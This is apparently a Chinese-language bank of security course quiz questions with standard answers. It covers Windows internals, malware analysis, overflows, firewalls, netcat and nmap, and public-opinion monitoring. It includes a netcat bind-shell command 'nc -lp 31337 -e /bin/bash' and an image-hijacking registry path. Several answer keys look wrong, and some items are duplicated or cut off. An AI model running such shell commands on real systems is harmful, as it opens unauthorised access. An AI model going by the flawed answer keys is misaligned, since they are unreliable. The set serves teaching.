A、 样本打开、触发漏洞、返回用户空间、显示正常页面
B、 样本打开、触发漏洞、搜索执行、恢复堆栈、返回用户空间、显示正常页面
C、 搜索执行、返回用户空间、显示正常页面
D、 触发漏洞、显示正常页面
您的答案: 标准答案: B
50、在Windows内置用户中,拥有最高权限的用户什么?( )
A、 Guest
B、 Adminitrator
C、 System
D、 User
您的答案: 标准答案: C
1、在Windows中将用户超级隐藏后,用户仍会在哪里有显示?( )
A、 命令提示符
B、 注册表
C、 用户组
D、 进程
您的答案: 标准答案: D
2、下列哪项不是Windows的常用文件系统?( )
A、 FAT32
B、 FILE
C、 NTFS
D、 EXT
您的答案: 标准答案: B
3、在NTFS文件系统中,子文件系统继承父文件系统权限后,如何修改子文件的权限?( )
A、 在子文件中修改
B、 在父文件中修改
C、 AB都可以
D、 上述都不对
您的答案: 标准答案: B
4、如果Windows中某文件采用EFS加密技术,未授权的其他管理员用户可以对文件进行什么操作?( )
A、 访问
B、 删除
C、 修改
D、 上述都不可以
您的答案: 标准答案: B
5、如何在未授权的情况下访问EFS加密的文件?( )
A、 输入管理员密码
B、 修改用户注册表
C、 导入证书
D、 修改为相同的用户名和密码
您的答案: 标准答案: C
6、在Windows中,为本地磁盘进行配额目的是什么?()
A、 平均分割磁盘
B、 避免部分用户占用磁盘过大
C、 清理垃圾文件
D、 提高磁盘利用率
您的答案: 标准答案: B
7、Windows中,在文件属性“共享”中,无法与之共享的用户是()
A、 Adminstrator
B、 Internet来宾用户
C、 Users
D、 Everyone
您的答案: 标准答案: C
8、Windows中,文件共享后,使用户对该文件权限和NTFS所设权限一样,方法有()
A、 开启共享向导
B、 启用脱机文件
C、 添加网上邻居向导
D、 更改共享对象
您的答案: 标准答案: A
9、Windows中,Service文件存储在什么地方()
A、 System32/config/service
B、 System32/config/system
C、 System/config/system
D、 System/config/service
您的答案: 标准答案: B
10、一个服务的启动类型为system,其在注册表中修改start的值是多少?( )
B、 1
C、 2
D、 3
您的答案: 标准答案: B
11、如何在DOS环境下查看系统当中的进程?
A、 tasklist
B、 taskkill
C、 del
D、 kill
您的答案: 标准答案: A
12、DOS下显示隐藏磁盘目录的命令是什么?
A、 attrib -s
B、 dir /ah
C、 type
D、 tree
您的答案: 标准答案: B
13、对病毒进行行为分析最常用的工具为?
A、 IDA Pro
B、 Process Monitor
C、 OllyDBG
D、 Process Explorer
您的答案: 标准答案: B
14、DOS下net share admin$ /del /y命令的作用是什么?
A、 添加系统根目录的共享
B、 查看共享
C、 取消系统根目录共享
D、 设置共享资源的用户
您的答案: 标准答案: C
15、Windows系统中的文件名查找函数是哪个?
A、 Process32First
B、 Module32First
C、 FindFirstFile
D、 Thread32First
您的答案: 标准答案: C
16、Windows系统终止指定进程及其所有线程的函数是什么?
A、 Process32First
B、 Module32First
C、 TerminateProcess
D、 Thread32First
您的答案: 标准答案: C
17、Windows系统字符连接函数是哪个?
A、 Process32First
B、 Module32First
C、 FindFirstFile
D、 lstrcat
您的答案: 标准答案: D
18、以下哪款工具可以实现查壳的工作?
A、 IDA Pro
B、 PEiD
C、 WinDbg
D、 Process Monitor
您的答案: 标准答案: B
19、在OD工具中,单步步过,单步步入的快捷键分别是什么?
A、 F8 F9
B、 F8 F7
C、 F7 F8
D、 F9 F7
您的答案: 标准答案: B
20、程序的返回值一般保存在以下哪个寄存器中?
A、 eax
B、 ebx
C、 ecx
D、 edx
您的答案: 标准答案: A
21、以下哪项不属于病毒的静态分析?
A、 采用反病毒引擎扫描
B、 计算哈希值
C、 查找字符串
D、 使用沙箱
您的答案: 标准答案: D
22、以下哪项不属于病毒的动态分析?
A、 使用沙箱
B、 行为监控
C、 PE分析
D、 WinDbg调试
您的答案: 标准答案: C
23、Windows获取进程信息建立进程快照的函数是?
A、 Module32First
B、 CreateToolhelp32Snapshot
C、 Process32First
D、 Heap32ListFirst
您的答案: 标准答案: B
24、Exeinfo PE工具的主要作用是什么?
A、 代码审计
B、 程序逆向
C、 查询文件是否加壳
您的答案: 标准答案: C
25、OllyDbg软件主要用于静态分析程序
A、 对
B、 错
您的答案: 标准答案: B
26、下列哪个工具可以查看软件内核模块?
A、 CDD Explorer.exe
B、 XueTr.exe
C、 WinHex
您的答案: 标准答案: B
27、当返回地址被覆盖时,新地址无效,main函数执行完后会执行什么指令?
A、 重新请求
B、 重新返回
C、 重新覆盖
D、 以上都不是
您的答案: 标准答案: D
28、视频中,当main函数执行完毕的时候,esp的值会发生什么变化?
A、 需认为设定为请求地址
B、 需认为设定为返回地址
C、 自动变成返回地址的下一个位置
D、 自动变成返回地址
您的答案: 标准答案: C
29、课程中,在0x00401005的地址处,再次利用什么功能,能够找到调用main函数的位置了?
A、 平行引用
B、 交叉引用
C、 跳位引用
D、 覆盖引用
您的答案: 标准答案: B
30、缓冲区溢出漏洞的原理,它就是因为我们输入了过长的字符,而缓冲区本身又没有有效的验证机制,导致过长的字符将返回地址覆盖掉了
A、 对
B、 错
您的答案: 标准答案: A
31、这样当CALL执行完后,程序再将该地址出栈,这样就能够知道下一步应该执行哪条指令,该地址称为?
A、 请求地址
B、 返回地址
C、 重复地址
D、 目标地址
您的答案: 标准答案: B
32、关于编写MessageBox()的调用过程中,下列说法错误的是?
A、 MessageBox()这个函数编写过程中,需要包含4个参数
B、 MessageBox()这个函数这个ApI函数包含有四个参数,其中可以给第一和第四个参数赋给0值
C、 编写该函数的调用过程中需要将两个参数中包含的字符串转换为十六进制
D、 编写该函数的调用过程中需要将两个参数中包含的字符串转换为ASCII码
您的答案: 标准答案: C
33、下列说法错误的是?
A、 MessageBoxA这个函数,它位于user32.dll
B、 所有的Win32程序都会自动加载kernel32.dll
C、 为了正常退出程序,还需要使用ExitProcess
D、 为了显示对话框,需要ExitProcess使用这个函数
您的答案: 标准答案: D
34、0x0012FFFF为系统默认的栈的底端
A、 对
B、 错
您的答案: 标准答案: A
35、关于W32Dasm的说法正确的是?
A、 W32Dasm是一款逆向分析软件,是一款比IDA Pro更为流行的软件
B、 W32Dasm是一款逆向分析软件,被誉为破解界的“屠龙刀”
C、 W32Dasm是一款逆向分析软件,因此其本身是不存在任何漏洞的
D、 W32Dasm这款逆向分析工具,但不是一个静态反汇编工具。
您的答案: 标准答案: B
36、MS06-040漏洞指的是?
A、 远程代码执行漏洞
B、 NetpwPathCanonicalize()函数存在着缓冲区溢出的缺陷
C、 心脏滴血漏洞
D、 远程桌面执行漏洞
您的答案: 标准答案: D
37、课程中的程序对字符串的长度限定是unicode的0x411个字符,也就是多少个字节?
A、 0x822
B、 0x823
C、 0x722
D、 2的36次方
您的答案: 标准答案: A
38、text:7517FC92 cmp esi, ebx 该代码表示的意思是 验证参数Source的长度是否大于0x411。
A、 对
B、 错
您的答案: 标准答案: A
39、(课程中,删掉)ecx中保存的是哪的地址?
A、 缓冲区结束位置的地址
B、 缓冲区中间位置的地址
C、 缓冲区起始位置的地址
D、 没有任何地址
您的答案: 标准答案: C
40、函数CanonicalizePathName()是不能够被直接调用的。
A、 对
B、 错
您的答案: 标准答案: A
41、Winamp是一款什么软件?
A、 Winamp是一款用于研究栈溢出的软件
B、 Winamp是一款音乐播放软件
C、 Winamp是一款视频播放软件
D、 Winamp是一款用于研究代码漏洞的软件
您的答案: 标准答案: B
42、whatsnew.txt文件位于Winamp文件夹中,保存内容是
A、 软件的更新历史信息
B、 软件的日志信息
C、 软件的备忘信息
D、 软件的回收信息
您的答案: 标准答案: A
43、视频中程序程序使用的是call esp的方法,那么esp所保存的地址是?
A、 0x00BDEDF0
B、 0x00BDEDE0
C、 0x00BDEDE4
D、 0x00BDEDE8
您的答案: 标准答案: D
44、以下哪种情况会造成整数溢出?
A、 inputTest:65535 ,outputTest:65535
B、 inputTest:65539,outputTest:65539
C、 inputTest:65536,outputTest:1
D、 inputTest:65537,outputTest:1
您的答案: 标准答案: D
45、32位的无符号整数可以表示的整数范围是:0-2的16次方-1。
A、 对
B、 错
您的答案: 标准答案: B
46、下列说法错误的是?
A、 无符号整数的下溢和上溢过程会触发安全性
B、 符号问题会触发安全性
C、 在高位数的整数复制到低位数的整数的时候会触发安全性
D、 整数在内存里面保存在一个固定长度的空间内,它能存储的最大值就是不固定
您的答案: 标准答案: D
47、函数sub_40366F一共有几个局部变量,几个参数?
A、 7,0
B、 7,4
C、 7,9
D、 4,7
您的答案: 标准答案: B
48、当代码接下来执行到0x004017BC的位置,会发现改代码的功能是?
A、 循环
B、 覆盖
C、 赋值
D、 清除
您的答案: 标准答案: A
49、krnln.fnr这个文件是加了壳,通过什么定律可以进行脱壳?
A、 ESP定律
B、 CALL定律
C、 main定律
D、 0x02定律
您的答案: 标准答案: A
50、 API函数都保存在操作系统提供的什么文件中?
A、 esp
B、 dat
C、 DLL
D、 exe
您的答案: 标准答案: C
1、这样当CALL执行完后,程序再将该地址出栈,这样就能够知道下一步应该执行哪条指令,该地址称为?
A、 请求地址
B、 返回地址
C、 重复地址
D、 目标地址
您的答案: 标准答案: B
2、关于编写MessageBox()的调用过程中,下列说法错误的是?
A、 MessageBox()这个函数编写过程中,需要包含4个参数
B、 MessageBox()这个函数这个ApI函数包含有四个参数,其中可以给第一和第四个参数赋给0值
C、 编写该函数的调用过程中需要将两个参数中包含的字符串转换为十六进制
D、 编写该函数的调用过程中需要将两个参数中包含的字符串转换为ASCII码
您的答案: 标准答案: C
3、下列说法错误的是?
A、 MessageBoxA这个函数,它位于user32.dll
B、 所有的Win32程序都会自动加载kernel32.dll
C、 为了正常退出程序,还需要使用ExitProcess
D、 为了显示对话框,需要ExitProcess使用这个函数
您的答案: 标准答案: D
4、0x0012FFFF为系统默认的栈的底端
A、 对
B、 错
您的答案: 标准答案: A
5、关于W32Dasm的说法正确的是?
A、 W32Dasm是一款逆向分析软件,是一款比IDA Pro更为流行的软件
B、 W32Dasm是一款逆向分析软件,被誉为破解界的“屠龙刀”
C、 W32Dasm是一款逆向分析软件,因此其本身是不存在任何漏洞的
D、 W32Dasm这款逆向分析工具,但不是一个静态反汇编工具。
您的答案: 标准答案: B
6、MS06-040漏洞指的是?
A、 远程代码执行漏洞
B、 NetpwPathCanonicalize()函数存在着缓冲区溢出的缺陷
C、 心脏滴血漏洞
D、 远程桌面执行漏洞
您的答案: 标准答案: D
7、课程中的程序对字符串的长度限定是unicode的0x411个字符,也就是多少个字节?
A、 0x822
B、 0x823
C、 0x722
D、 2的36次方
您的答案: 标准答案: A
8、text:7517FC92 cmp esi, ebx 该代码表示的意思是 验证参数Source的长度是否大于0x411。
A、 对
B、 错
您的答案: 标准答案: A
9、(课程中,删掉)ecx中保存的是哪的地址?
A、 缓冲区结束位置的地址
B、 缓冲区中间位置的地址
C、 缓冲区起始位置的地址
D、 没有任何地址
您的答案: 标准答案: C
10、函数CanonicalizePathName()是不能够被直接调用的。
A、 对
B、 错
您的答案: 标准答案: A
11、Winamp是一款什么软件?
A、 Winamp是一款用于研究栈溢出的软件
B、 Winamp是一款音乐播放软件
C、 Winamp是一款视频播放软件
D、 Winamp是一款用于研究代码漏洞的软件
您的答案: 标准答案: B
12、whatsnew.txt文件位于Winamp文件夹中,保存内容是
A、 软件的更新历史信息
B、 软件的日志信息
C、 软件的备忘信息
D、 软件的回收信息
您的答案: 标准答案: A
13、视频中程序程序使用的是call esp的方法,那么esp所保存的地址是?
A、 0x00BDEDF0
B、 0x00BDEDE0
C、 0x00BDEDE4
D、 0x00BDEDE8
您的答案: 标准答案: D
14、以下哪种情况会造成整数溢出?
A、 inputTest:65535 ,outputTest:65535
B、 inputTest:65539,outputTest:65539
C、 inputTest:65536,outputTest:1
D、 inputTest:65537,outputTest:1
您的答案: 标准答案: D
15、32位的无符号整数可以表示的整数范围是:0-2的16次方-1。
A、 对
B、 错
您的答案: 标准答案: B
16、下列说法错误的是?
A、 无符号整数的下溢和上溢过程会触发安全性
B、 符号问题会触发安全性
C、 在高位数的整数复制到低位数的整数的时候会触发安全性
D、 整数在内存里面保存在一个固定长度的空间内,它能存储的最大值就是不固定
您的答案: 标准答案: D
17、函数sub_40366F一共有几个局部变量,几个参数?
A、 7,0
B、 7,4
C、 7,9
D、 4,7
您的答案: 标准答案: B
18、当代码接下来执行到0x004017BC的位置,会发现改代码的功能是?
A、 循环
B、 覆盖
C、 赋值
D、 清除
您的答案: 标准答案: A
19、krnln.fnr这个文件是加了壳,通过什么定律可以进行脱壳?
A、 ESP定律
B、 CALL定律
C、 main定律
D、 0x02定律
您的答案: 标准答案: A
20、 API函数都保存在操作系统提供的什么文件中?
A、 esp
B、 dat
C、 DLL
D、 exe
您的答案: 标准答案: C
21、在操作系统中安装全局钩子以后,只要目标进程符合我们所设定的条件,全局钩子的DLL文件会被操作系统自动或强行地加载到该进程中。
A、 对
B、 错
您的答案: 标准答案: A
22、“开启监控”按钮的功能是首先需要获取欲注入的DLL程序的完整路径,也就是当前目录。
A、 对
B、 错
您的答案: 标准答案: A
23、关闭监控”按钮的功能是查找explorer.exe进程中是否含有我们所注入的什么文件?
A、 kernel32.dll
B、 CreateProcessHook.dll
C、 HookCreateProcess.dll
D、 LoadLibraryA.dll
您的答案: 标准答案: C
24、因为程序使用了getcwd()函数获取当前路径,所以需要添加头文件direct.h,而为了实现进程的遍历,但不需要包含头文件Tlhelp32.h。
A、 对
B、 错
您的答案: 标准答案: B
25、CRC32查杀方式比传统的查杀方式的查杀效率高一些。
A、 对
B、 错
您的答案: 标准答案: B
26、熊猫病毒特征码的字节是多少个字节?
A、 32
B、 33
C、 16
D、 24
您的答案: 标准答案: A
27、U盘病毒的文件偏移是?
A、 0x192
B、 x1920
C、 0x1920
D、 0x190
您的答案: 标准答案: C
28、如果计算机已经中了病毒,现在我们拥有了该病毒的特征码,那么我们能否修复该病毒给计算机造成的危害。
A、 对
B、 错
您的答案: 标准答案: B
29、有些病毒为了实现网站劫持,使其重定向到自己指定的地址,那么为了达到这一目的,通常做法是Windows系统里位于%SystemRoot%\system32\drivers目录下的hosts文件。
A、 对
B、 错
您的答案: 标准答案: B
30、无论程序是用C#,还是C++,或是VB编写,最终都被编译为.NET的中间语言IL。
A、 对
B、 错
您的答案: 标准答案: A
31、计算机病毒的会造成哪些危害?
A、 磁盘破坏
B、 计算机用户的伤害
C、 CPU的损坏
D、 程序和数据的破坏
您的答案: 标准答案: D
32、在Windows 32 位操作系统中,其EXE文件中的特殊表示为?
A、 MZ
B、 PE
C、 NE
D、 LE
您的答案: 标准答案: B
33、能够感染EXE、COM 文件的病毒属于?
A、 网络型病毒
B、 蠕虫型病毒
C、 文件型病毒
D、 系统引导型病毒
您的答案: 标准答案: C
34、下列描述不正确的是?
A、 不存在能够防治未来的所有病毒的发病毒软、硬件
B、 现在的杀毒软件能够查杀未知病毒
C、 病毒产生在前,反病毒手段相对滞后
D、 数据备份是防治数据丢失的重要手段
您的答案: 标准答案: B
35、下列预防计算机病毒的注意事项中,错误的是?
A、 不使用网络,以免中毒
B、 重要资料经常备份
C、 备好启动盘
D、 尽量避免在无防毒软件机器上使用可移动储存介质
您的答案: 标准答案: A
36、什么是敲竹杠病毒?
A、 对电脑设置开机密码类,再提供密码索要费用的木马病毒
B、 盗取数据信息的病毒
C、 破坏计算机运行的病毒
D、 伪装监控病毒
您的答案: 标准答案: A
37、在OD工具调试中,JE跳转不成立,不改变病毒运行顺序的情况下,可以把ZF标志位修改为1。
A、 对
B、 错
您的答案: 标准答案: A
38、EAX寄存器保存的是操作字符串的地址信息。
A、 对
B、 错
您的答案: 标准答案: A
39、病毒屏蔽杀毒软件后可以用改文件名的方法来进行绕过。
A、 对
B、 错
您的答案: 标准答案: A
40、注册表映像劫持的路径是?
A、 HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer
B、 HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run
C、 HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\
D、 HKCU\Software\Microsoft\Windows\CurrentVersion\Run
您的答案: 标准答案: C
41、CreateToolhelp32Snapshot函数解析正确的是?
A、 检索系统快照中遇到的第一个进程的信息
B、 搜索一个文件或子目录名匹配一个特定名称的目录
C、 获取进程信息为指定的进程、进程使用的堆、线程建立一个快照
D、 函数终止指定进程及其所有线程
您的答案: 标准答案: C
42、每个函数都有自己的栈帧,每个函数都是利用自己的栈帧空间保存全局变量与函数的调用关系。()
A、 对
B、 错
您的答案: 标准答案: B
43、如果能控制进程的执行流程,不能够执行想要执行的指令,达到我们目的的指令序列就叫做shellcode。()
A、 对
B、 错
您的答案: 标准答案: B
44、下面是漏洞代码,分析的结果:创建一个ba数组,将ba内容加密,修改ba内容,为ba解密。()
A、 对
B、 错
您的答案: 标准答案: B
45、缓冲区溢出漏洞的原理,它就是因为我们输入了过长的字符,而缓冲区本身又没有有效的验证机制,导致过长的字符将返回地址覆盖掉了
A、 对
B、 错
您的答案: 标准答案: A
46、0x0012FFFF为系统默认的栈的底端
A、 对
B、 错
您的答案: 标准答案: A
47、text:7517FC92 cmp esi, ebx 该代码表示的意思是 验证参数Source的长度是否大于0x411。
A、 对
B、 错
您的答案: 标准答案: A
48、函数CanonicalizePathName()是不能够被直接调用的。
A、 对
B、 错
您的答案: 标准答案: A
49、32位的无符号整数可以表示的整数范围是:0-2的16次方-1。
A、 对
B、 错
您的答案: 标准答案: B
50、在操作系统中安装全局钩子以后,只要目标进程符合我们所设定的条件,全局钩子的DLL文件会被操作系统自动或强行地加载到该进程中。
A、 对
B、 错
您的答案: 标准答案: A
1、企业常见身份标识技术有ID、用户名、AD域控、行为管理设备、账号、LDAP。()
A、 对
B、 错
您的答案: 标准答案: A
2、通过观景、入口、设施社区布局、照明等条件模式来预防犯罪。()
A、 对
B、 错
您的答案: 标准答案: A
3、在车库内、楼梯间和电梯使用玻璃窗能让犯罪者打消作案心里想法。()
A、 对
B、 错
您的答案: 标准答案: A
4、TOGAF框架需求管理迭代步骤方法正确的是():
A、 架构愿景,业务架构,信息系统架构,技术架构,机会及解决方案,迁移规划,实施治理,构架变更管理
B、 预备阶段,架构能力管理,架构愿景,业务架构,信息系统架构,技术架构,机会及解决方案,迁移规划,实施治理,构架变更管理
C、 信息系统架构,技术架构,机会及解决方案,迁移规划,实施治理,构架变更管理
D、 构架变更管理,实施治理,迁移规划,机会及解决方案,,技术架构,信息系统架构
您的答案: 标准答案: A
5、Zachman企业框架方向和设计都是采用纵横坐标。()
A、 对
B、 错
您的答案: 标准答案: A
6、Zachman模型不是基于人来开发的一个模型框架。()
A、 对
B、 错
您的答案: 标准答案: B
7、SABSA模型内容不包括的层次是():
A、 审计、战略
B、 度量、实施
C、 渗透、防御
D、 概念
您的答案: 标准答案: C
8、SABSA模型纵横坐标定义错误的是():
A、 纵坐标:上下文,概念层,逻辑层,物理层,组件层,运营层
B、 横坐标:什么,为什么,过程,谁,地点,时间
C、 纵坐标:业务连续性,风险管理,服务和支持,管理和支持,平台安全,日程表
D、 横坐标:数据结构,标准,工具,标识、功能、ACL,过程和协议,顺序
您的答案: 标准答案: C
9、SABSA模型不是基于安全架构开发的一个模型和方法论。()
A、 对
B、 错
您的答案: 标准答案: B
10、CobiT是一个IT实践帮助模型,也是指导、IT管理标岗、控制和参考模型。()
A、 对
B、 错
您的答案: 标准答案: A
11、第一代防火墙技术是基于电路层流量
A、 对
B、 错
您的答案: 标准答案: B
12、数据通过防火墙传输是发生在哪层
A、 会话层
B、 传输层
C、 网络层
D、 链路层
您的答案: 标准答案: C
13、防火墙术语中Trust指的是
A、 源端口
B、 源IP
C、 NAT
D、 DMZ
您的答案: 标准答案: B
14、集成防火墙类似于UTM
A、 对
B、 错
您的答案: 标准答案: A
15、防火墙的简单包过滤工作相关说法正确的是
A、 防火墙会检查数据区是否有恶意数据
B、 防火墙会建立连接状态表用于保持连接
C、 前后报文无关联
D、 防火墙对应用层控制较强
您的答案: 标准答案: C
16、防火墙包过滤规则中,21端口用于FTP数据包的传输
A、 对
B、 错
您的答案: 标准答案: B
17、CPU指令类型包括进程和线程
A、 对
B、 错
您的答案: 标准答案: A
18、分层级设计的操作系统中,0层控制哪方面
A、 应用程序
B、 存储
C、 处理器
D、 进程
您的答案: 标准答案: C
19、微内核架构中,核心在微内核,其它在客户端服务器端
A、 对
B、 错
您的答案: 标准答案: B
20、系统安全架构中属于终端防护的是
A、 主机防火墙
B、 交换机管理
C、 补丁管理
D、 上网监控
您的答案: 标准答案: A
21、操作系统安全保护的核心是系统应用程序及数据库功能
A、 对
B、 错
您的答案: 标准答案: B
22、Linux系统中对文件的权限控制属于哪类信息安全模型
A、 非干扰模型
B、 Biba模型
C、 Clark-Wilson模型
D、 访问矩阵模型
您的答案: 标准答案: D
23、以下哪类模型采用了分层级的设计
A、 信息流模型
B、 中国墙模型
C、 Bell-LaPadula模型
D、 非干扰模型
您的答案: 标准答案: C
24、状态机模型描述了一种无论处于何种状态都是绝对安全的系统
A、 对
B、 错
您的答案: 标准答案: B
25、人在互联网中的角色呈现多样性这个说法正确吗
A、 对
B、 错
您的答案: 标准答案: A
26、视频中以下哪项不是舆情分析需要的知识储备?
A、 传播学
B、 统计学
C、 心理学
D、 人体力学
您的答案: 标准答案: D
27、舆情是指社会公众对于网络上的某些事件和话题在现实中所进行的行为这个说法正确吗
A、 对
B、 错
您的答案: 标准答案: B
28、企业和政府中的舆情分析体系包括信息监测这个环节吗?
A、 对
B、 错
您的答案: 标准答案: A
29、在进行舆情事件分析时首先考量的是所在组织的利害关系这个说法对吗
A、 对
B、 错
您的答案: 标准答案: A
30、在案例中相关企业应当快速回应避免对品牌造成伤害这个说法正确吗
A、 对
B、 错
您的答案: 标准答案: A
31、监测系统的作用在于海量信息的筛选这个说法正确吗?
A、 对
B、 错
您的答案: 标准答案: A
32、舆情分析工作中可以根据情况自己进行决策执行这个说法正确吗
A、 对
B、 错
您的答案: 标准答案: B
33、研究舆情事件中参与者的身份构成重要吗
A、 对
B、 错
您的答案: 标准答案: A
34、下面哪些步骤是舆情管理中不必要的?
A、 舆情分析
B、 组织协同
C、 事后总结
D、 事件处理
您的答案: 标准答案: C
35、组织在舆情事件出现后的协同要根据组织架构中各个部分的职责和职能进行协同这个说法正确吗
A、 对
B、 错
您的答案: 标准答案: A
36、单个维权和群体维权对于舆情工作的区别只是在于数量这个说法正确吗
A、 对
B、 错
您的答案: 标准答案: B
37、这次事件后国家食品药品监督管理总局针对社会关心的疫苗安全问题发布科普知识予以回应,这是一种舆情处理吗?
A、 对
B、 错
您的答案: 标准答案: A
38、课程中的组织设计的管理考核是指划定舆情工作任务量化目标这个说法正确吗?
A、 对
B、 错
您的答案: 标准答案: A
39、管理者除了对舆情部门的管理还必须包括对自身信息的管理这个说法正确吗
A、 对
B、 错
您的答案: 标准答案: A
40、领导能力只包括政策解读和决策对应两种能力这个说法正确吗?
A、 对
B、 错
您的答案: 标准答案: B
41、分析研判包括对信息产生的后果的预测这个说法正确吗
A、 对
B、 错
您的答案: 标准答案: A
42、舆情工作的技术环节重点在于信息的收集和过滤这个说法正确吗
A、 对
B、 错
您的答案: 标准答案: A
43、视频中从哪个角度分析网民对快播案件的态度?
A、 法律
B、 网民结构
C、 道德
D、 互联网发展
您的答案: 标准答案: B
44、视频中提出的分析报告中网民主要的年龄段是多少?
A、 0-5
B、 6-17
C、 18-25
D、 25-35
您的答案: 标准答案: C
45、网站登记备案归以下哪个部门管理?
A、 公安部
B、 网信办
C、 宣传部
D、 国安部
您的答案: 标准答案: B
46、监测系统的最终目标在于什么?
A、 关键字监测
B、 敏感词发现
C、 内容分析
D、 提高效率
您的答案: 标准答案: D
47、关键字监测和敏感词发现的目的在于过滤不相关信息这个说法正确吗
A、 对
B、 错
您的答案: 标准答案: A
48、棱镜计划是只收集美国公民手机的隐私数据这个说法正确吗
A、 对
B、 错
您的答案: 标准答案: B
49、监测系统用户管理中的审批功能是为了保障信息安全这个说法正确吗?
A、 对
B、 错
您的答案: 标准答案: A
50、监测系统的重点在于信息收集能力,而不在于信息关联能力这个说法正确吗?
A、 对
B、 错
您的答案: 标准答案: B
1、下列哪项不是信息安全的定义?
A、 数据安全,确保数据不会被非法入侵者读取或破坏
B、 程序安全,重视软件开发过程的品质及维护
C、 系统安全,维护计算机系统正常操作
D、 环境安全,管理员不能用弱口令
您的答案: 标准答案: D
2、下列哪项不是正确的防止被骗操作?
A、 在淘宝购买东西应该使用旺旺交流
B、 商家发送的发票文件,直接打开
C、 商品多次修改价格,应该提高警惕
D、 对商家发送的文件进行查杀
您的答案: 标准答案: B
3、下列选项中对DES加密算法描述不正确的是?
A、 以64位为分组对数据进行加密
B、 其密钥长度为56位
C、 运用相同算法进行加密解密
D、 DES加密算法为最安全的加密算法之一
您的答案: 标准答案: D
4、下列关于标准防火墙的描述错误的是?
A、 防火墙安全规则遵循从上到下匹配原则,一旦有一条匹配,剩余的规则就不匹配了
B、 所有的规则都没有匹配到,数据包将丢弃
C、 安全过滤规则主要包含源、目的地址和端口
D、 防火墙的主要功能是防止病毒等恶意程序的传输
您的答案: 标准答案: D
5、对于“access-list 101 primit tcp any host 198.78.46.8 eq www”的acl规则理解正确的是?
A、 匹配顺序为101,允许ip为198.78.46.8的主机访问任何外部ip
B、 规则强度为101,不允许TCP连接,禁止所有主机对198.78.46.8的www服务进行访问
C、 匹配顺序为101,允许TCP连接,所有主机对198.78.46.8的www服务进行访问
D、 匹配顺序为101,允许TCP连接,禁止禁止所有主机对198.78.46.8的www服务进行访问
您的答案: 标准答案: C
6、下列那些SMTP命令是用来发送邮件的Envelop的?
A、 HELO xxx.com
B、 MAIL FROM :<>和RCPT TO:<>
C、 DATA
D、 AUTH LOGIN
您的答案: 标准答案: B
7、下列关于信息安全保障的描述错误的是?
A、 信息安全保障的是核心业务,信息安全保障是为了支撑业务的正常运行
B、 信息系统安全的保障是在整个信息系统的生命周期中
C、 要确保信息系统的保密性、完整性、和可用性
D、 信息安全保障策略的制定没办法考虑到地震、海啸等大自然的不可抗力
您的答案: 标准答案: D
8、下列对于下一代防火墙的描述错误的是?
A、 将访问控制对象从网络层、传输层延伸到应用层
B、 下一代防火墙能够识别应用和内容
C、 下一代防火墙可以限制用户是否能在上班时间访问娱乐社交软件
D、 下一代防火墙已经丢弃了传统防火墙的工作模式
您的答案: 标准答案: D
9、下列关于KDC的描述错误的是?
A、 KDC是秘钥分发中心
B、 网络中所有客户机和服务器都信任KDC,并使用KDC验证用户身份
C、 KDC是由认证服务和票据授予服务组成
D、 认证服务的作用主要是生成两个主题之间通信的票据
您的答案: 标准答案: D
10、下列哪项不是防火墙常见的工作方式?
A、 包过滤
B、 状态监测
C、 透明接入
D、 应用代理
您的答案: 标准答案: C
11、下列选项中关于ACL规则的匹配原则描述不正确的是?
A、 防火墙安全规则遵循从上到下匹配的原则
B、 如果所有的规则都没有匹配到,数据包将被丢弃
C、 安全过滤规则只包含源、目的地址和端口
D、 防火墙安全规则匹配时一旦有一条匹配,剩余的都不再进行匹配
您的答案: 标准答案: C
12、下列选项中关于防火墙的透明部署方式描述错误的是?
A、 内外网在一个网段内
B、 优点是直接串联到链路上,不改变原有的网络IP地址配置
C、 缺点是像玻璃一样,屋内屋外一览无余
D、 透明模式即用户可以访问到网络安全设备
您的答案: 标准答案: D
13、下列关于nc -lp 31337 -e /bin/bash 的理解错误的是____。
A、 打开并监听本地端口31337,等待主机连接
B、 -e 代表将/bin/bash 绑定在此端口上
C、 这是使用netcat反弹shell的命令
D、 使用的是反向连接方式反弹shell
您的答案: 标准答案: D
14、下列选项中最复杂的密码是____。
A、 博福特密码
B、 弗纳姆密码
C、 滚动密钥密码
D、 转轮密码
您的答案: 标准答案: D
15、下列关于Netcat的操作的描述错误的是____。
A、 nc -G 追踪连接可用于网络排查
B、 -o 会将显示的内容输出到一个指定文件
C、 -h 打开nc的帮助文档
D、 -l 表示打ip列表
您的答案: 标准答案: D
16、下列关于nc -lp 31337 -e /bin/bash 的理解错误的是____。
A、 打开并监听本地端口31337,等待主机连接
B、 -e 代表将/bin/bash 绑定在此端口上
C、 这是使用netcat反弹shell的命令
D、 使用的是反向连接方式反弹shell
您的答案: 标准答案: D
17、下列哪些功能不是netcat能做到的?
A、 在两台主机之间通信
B、 在两台主机之间传输文件
C、 反弹主机shell
D、 漏洞扫描以及利用
您的答案: 标准答案: D
18、下面对于"nc www.google.com 80"的描述错误的是?
A、 连接google.com 开放的80端口
B、 可以获取一些关于主机的信息
C、 可以发送http请求包来访问网站
D、 不会连接成功
您的答案: 标准答案: D
19、使用____命令检测目标主机的端口开放情况。
A、 nmap --version
B、 nmap
C、 nmap -A -v
D、 nmap -sP 192.168.0.0/24
您的答案: 标准答案: B
20、下列对于“nmap 10.73.31.0/24 --exclude 10.73.31.184”的理解错误的是____。
A、 nmap 10.73.31.0/24 是指扫描该IP的整个C段网络
B、 nmap 10.73.31.0/24 等于 nmap 10.73.31.*
C、 --exclude 10.73.31.184 是指 在扫描整个C段网络时 排除10.73.31.184这个IP
D、 扫描结果会包含主机操作系统信息
您的答案: 标准答案: D
21、只进行主机存活探测,使用____命令。
A、 nmap --version
B、 nmap
C、 nmap -A -v
D、 nmap -sP 192.168.0.0/24
您的答案: 标准答案: D
22、密码术中永恒的两大原则是____。
A、 替换 换位
B、 混乱 换位
C、 混乱 扩散
D、 扩散 替换
您的答案: 标准答案: A
23、下列关于DES算法描述不正确的是____。
A、 密钥较短
B、 加解密速度快
C、 适用于加密大量数据的场合
D、 加解密的密钥相同
您的答案: 标准答案: D
24、下列选项中不属于密码对信息的保护的是____。
A、 信息的传输
B、 信息的存储
C、 信息的交换
D、 信息的发布
您的答案: 标准答案: D
25、下列____不属于单钥体制的密码系统。
A、 代数作业体制
B、 序列密码体制
